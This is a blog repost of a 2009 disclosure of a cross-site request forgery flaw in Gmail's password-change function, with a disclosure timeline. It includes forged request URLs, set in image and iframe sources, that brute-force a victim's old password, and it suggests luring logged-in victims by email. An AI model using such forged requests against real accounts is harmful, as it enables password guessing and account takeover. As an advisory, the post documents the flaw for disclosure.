HackingRoXX: GMail Service CSRF Vulnerability

9:28 AM

GMail Service CSRF Vulnerability

Summary

Gmail is Google's "free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations".

Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.

GMail is vulnerable to CSRF attacks in the "Change Password" functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.

An attacker can create a page that includes requests to the "Change password" functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker.

The attack is facilitated since the "Change Password" request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the "Change Password" form.

DETAILS

Proof of concept:
1. An attacker create a web page "csrf-attack.html" that realize many HTTP GET requests to the "Change Password" functionality.

For example, a password cracking of 3 attempts (see "OldPasswd" parameter):
...
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

or with hidden frames:
...
src="<a href="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&" target="_blank">https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&</a> OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> <br /><iframe <br />src="<a href="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&" target="_blank">https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&</a> OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> <br /><iframe <br />src="<a href="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&" target="_blank">https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&</a> OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> <br />... <br /> <br />The attacker can use deliberately a weak new password (see "Passwd" and "PasswdAgain" parameters), this way he can know if the analyzed password is correct without need to modify the password of the victim user. <br /> <br />Using weak passwords the "Change Password" response is: <br /> - " The password you gave is incorrect. ", if the analyzed password is not correct. <br /> - " We're sorry, but you've selected an insecure password. In order to protect the security of your account, please click "Password Strength" to get tips on choosing to safer password. ", if the analyzed password is correct and the victim password is not modified. <br /> <br />If the attacker want to modify the password of the victim user, the waited response message is: " Your new password has been saved - OK ". <br /> <br />In any case, the attacker evades the restrictions imposed by the captcha of the authentication form. <br /> <br />2. A user authenticated in GMail visit the "csrf-attack.html" page controlled by the attacker. <br /> <br />For example, the attacker sends a mail to the victim (a GMail account) and provokes that the victim visits his page (social engineering). So, the attacker insures himself that the victim is authenticated. <br /> <br />3. The password cracking is executed transparently to the victim. <br /> <br /><b>History:</b> <br /> <br />Disclosure timeline: <br />July 30, 2007: Vulnerability acquired by Internet Security Auditors. <br />August 1, 2007: Initial notification sent to the Google security team. <br />August 1, 2007: Google security team request additional information. about and start review the vulnerability. <br />August 13, 2007: Request information about the status. <br />August 15, 2007: Google security team responds that they are still working on this. <br />September 19, 2007: Request for the status. No response. <br />November 26, 2007: Request for the status. No response. <br />January 2, 2008: Request for the status. No response. <br />January 4, 2008: Request for the status. No response. <br />January 11, 2008: Request for the status. No response. <br />January 15, 2008: Request for the status. Automated response. <br />January 18, 2008: Google security team informs that don't expect behaviour to change in the short term giving the justification. We deconstruct those arguments as insufficient. No more responses. <br />December 30, 2008: Request for the status. Confirmation from Google they won't change the consideration about this. <br />January 11, 2009: Publication to Bugtraq. Rejected twice. No reasons. <br />March 03, 2009: General publication for disclosure in other lists. </p> <div style='clear: both;'></div> </div> <span class='date'> Posted by Cyber Trunks </span> </div> <div class='postmetadata'> <div class='alignleft'> </div> <div class='alignright'> <a href='#top'> TOP </a> </div> <p class='post-footer-line post-footer-line-1'> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='https://www.blogger.com/email-post.g?blogID=1504684532396088844&postID=648866545727135954' title='Email Post'> <span class='email-post-icon'> </span> </a> </span> </span> </p> <p class='post-footer-line post-footer-line-2'></p> </div> </div> <div class='comments' id='comments'> <a name='comments'></a> <h4> 0 comments: </h4> <dl id='comments-block'> </dl> <p class='comment-footer'> <a href='https://www.blogger.com/comment/fullpage/post/1504684532396088844/648866545727135954' onclick=''> Post a Comment </a> </p> <div id='backlinks-container'> <div id='Blog1_backlinks-container'> </div> </div> </div>  </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> |<a class='blog-pager-newer-link' href='http://blog4hacks.blogspot.com/2009/07/vulnerability-in-server-service-allows.html' id='Blog1_blog-pager-newer-link' title='Newer Post'>Newer Post</a> </span> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='http://blog4hacks.blogspot.com/2009/07/buffer-overflow-exploitation-and.html' id='Blog1_blog-pager-older-link' title='Older Post'>Older Post</a>| </span> |<a class='home-link' href='http://blog4hacks.blogspot.com/'>Home</a> </div> <div class='clear'></div> <div class='post-feeds'> <div class='feed-links'> Subscribe to: <a class='feed-link' href='http://blog4hacks.blogspot.com/feeds/648866545727135954/comments/default' target='_blank' type='application/atom+xml'>Post Comments (Atom)</a> </div> </div> </div><div class='widget HTML' data-version='1' id='HTML5'> <div class='widget-content'>  <script type="text/javascript"> var AdBrite_Title_Color = '0000FF'; var AdBrite_Text_Color = '000000'; var AdBrite_Background_Color = 'FFFFFF'; var AdBrite_Border_Color = 'CCCCCC'; var AdBrite_URL_Color = '008000'; try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==''?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe='';var AdBrite_Referrer='';} </script> <span style="white-space:nowrap;"><script type="text/javascript">document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(' src="http://ads.adbrite.com/mb/text_group.php?sid=1062326&zs=3732385f3930&ifr='+AdBrite_Iframe+'&ref='+AdBrite_Referrer+'" type="text/javascript">');document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));</script> <a target="_top" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=1062326&afsid=1"><img border="0" style="background-color:#CCCCCC;border:none;padding:0;margin:0;" alt="Your Ad Here" width="14" src="http://files.adbrite.com/mb/images/adbrite-your-ad-here-leaderboard.gif" height="90"/></a></span>  </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML8'> <div class='widget-content'> <script> britepic_id="1290705"; britepic_src="http://i297.photobucket.com/albums/mm204/j4jokes/a1/b279.jpg"; britepic_keywords="cute%20girls,asian%20girls,cute%20girl%20painting"; britepic_show_ads=1; britepic_show_menu=1; britepic_href="http%3A//blog4hacks.blogspot.com/"; </script> <script src="http://www.britepic.com/britepic.js"></script> <noscript><img src="http://i297.photobucket.com/albums/mm204/j4jokes/a1/b279.jpg"/></noscript> </div> <div class='clear'></div> </div></div> <div class='navigation'> <div class='alignright'></div> </div> </div> <div class='clear'></div> </div> <div id='footer'> <div class='erss'> ©Design by <a href='http://web2feel.com/' target='_blank'>Jinsona </a>.Converted to Blogger by <a href='http://www.bloggertricks.com' target='_blank' title='Free Blogger Templates'>Blogger Templates</a> </div> <div class='credits'> <a href='#top'> TOP </a> </div> </div> </div> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/984859869-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY5q8Vz7TNoOOUKSGozLFILOoRjXpg:1731900315728';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d1504684532396088844','//blog4hacks.blogspot.com/2009/07/gmail-service-csrf-vulnerability.html','1504684532396088844'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '1504684532396088844', 'title': 'HackingRoXX', 'url': 'http://blog4hacks.blogspot.com/2009/07/gmail-service-csrf-vulnerability.html', 'canonicalUrl': 'http://blog4hacks.blogspot.com/2009/07/gmail-service-csrf-vulnerability.html', 'homepageUrl': 'http://blog4hacks.blogspot.com/', 'searchUrl': 'http://blog4hacks.blogspot.com/search', 'canonicalHomepageUrl': 'http://blog4hacks.blogspot.com/', 'blogspotFaviconUrl': 'http://blog4hacks.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22HackingRoXX - Atom\x22 href\x3d\x22http://blog4hacks.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22HackingRoXX - RSS\x22 href\x3d\x22http://blog4hacks.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22HackingRoXX - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/1504684532396088844/posts/default\x22 /\x3e\n\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22HackingRoXX - Atom\x22 href\x3d\x22http://blog4hacks.blogspot.com/feeds/648866545727135954/comments/default\x22 /\x3e\n', 'meTag': '', 'adsenseClientId': 'ca-pub-1861969124982423', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': true, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/51f2c5635a23dea1', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'item', 'postId': '648866545727135954', 'pageName': 'GMail Service CSRF Vulnerability', 'pageTitle': 'HackingRoXX: GMail Service CSRF Vulnerability'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'GMail Service CSRF Vulnerability', 'description': 'Summary \r \r Gmail is Google\x27s \x22free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (an...', 'url': 'http://blog4hacks.blogspot.com/2009/07/gmail-service-csrf-vulnerability.html', 'type': 'item', 'isSingleItem': true, 'isMultipleItems': false, 'isError': false, 'isPage': false, 'isPost': true, 'isHomepage': false, 'isArchive': false, 'isLabelSearch': false, 'postId': 648866545727135954}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'top', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_SubscribeView', new _WidgetInfo('Subscribe1', 'sidebar3', document.getElementById('Subscribe1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar3', document.getElementById('HTML1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar3', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar3', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'sidebar102', document.getElementById('HTML3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogSearchView', new _WidgetInfo('BlogSearch1', 'sidebar102', document.getElementById('BlogSearch1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar102', document.getElementById('HTML2'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar102', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML7', 'content236', document.getElementById('HTML7'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'content236', document.getElementById('HTML4'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'content236', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2646514562-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/1964470060-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'content236', document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'content236', document.getElementById('HTML8'), {}, 'displayModeFull')); </script> </body> </html>

HackingRoXX

Categories

Blog Archive

GMail Service CSRF Vulnerability

HackingRoXX

Subscribe To

Categories

Blog Archive

GMail Service CSRF Vulnerability